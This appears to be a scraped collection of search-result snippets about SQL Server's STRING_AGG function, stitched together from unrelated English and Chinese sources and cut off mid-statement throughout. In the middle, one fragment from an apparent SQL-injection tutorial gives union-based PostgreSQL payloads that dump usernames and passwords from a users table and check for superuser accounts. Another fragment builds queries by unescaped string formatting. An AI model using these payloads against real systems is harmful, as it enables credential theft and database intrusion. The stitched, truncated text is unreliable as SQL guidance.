SELECT STRING_AGG([value], ',') WITHIN GROUP (ORDER BY[value])FROM@dump_data Source Code 如果你不想创建临时表,把拆分的数据插⼊临时表,步骤繁复。可以使⽤派⽣表来进⾏:SELECT STRING_AGG([value], ',') WITHIN GROUP (ORDER BY[value])FROM (SELECT[value]FROM STRING_SPLIT(@str,',...
Using STRING_AGG with WITHIN GROUP Example The following example shows how to display the list of email addresses from the EmailAddress table separated by commas and order in descending order using the WITHIN GROUP clause. SELECTSTRING_AGG(CONVERT(NVARCHAR(max),EmailAddress),',')WITHINGROUP(ORDER...
and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users ⑧ 补充-获取dba超级管理员用户(在DBA用户下,可以进行文件读写):判断当前获取的用户是否是超级管理员用户 and 1=2 union select null,string_agg(usename,','),null,null FROM pg_user WHERE usesuper ...
string.Format(@"SELECT * INTO #T FROM (SELECT {0}, ROW_NUMBER() over(order by {1} {2}) nr FROM {3} where 1=1 {4}) A WHERE nr between (({5} - 1) * {6} + 1) and ({5} * {6})select V.* from #T INNER JOIN {3} V ON #T.{0}=V.{0} ORDER BY V.{1} {2...
SELECTu.Name,PhoneNumbers=STRING_AGG(CONCAT(p.PhoneType,' ',p.PhoneNumber),', ')WITHINGROUP(ORDERBYp.PhoneType)FROMdbo.UsersASuLEFTOUTERJOINdbo.UserPhonesASpONu.UserID=p.UserIDGROUPBYu.NameORDERBYu.Name; Copy Results: Regarding performance, I created a much larger data set: ...
STRING_AGG bug SUSDB (Recovery Pending) state/error syntax error for option(maxrecursion 0) sys.dm_db_index_physical_stats takes a very long time to run on a small table sys.dm_exec_query_stats cleared frequently? sysindexes states that sys.sysrscols contains 50 million rows. How to free...
By use case CI/CD & Automation DevOps DevSecOps Resources Topics AI DevOps Security Software Development View all Explore Learning Pathways White papers, Ebooks, Webinars Customer Stories Partners Open Source GitHub Sponsors Fund open source developers The ReadME Project GitHub community...
SQL Management studio copy paste result out (string_agg line break) 摘要:refer : string agg char(10) 之后, copy paste 没效果,可以试试看这个, 另外有时候 copy paste 出来次序是 阅读全文 posted @ 2020-09-01 22:35 ...
The following output is expected: “Koen, Bruce, Jeremy” Since SQL Server 2017, we have theSTRING_AGGfunction which can solve our request with a single statement. SELECT[DepartmentName],[employees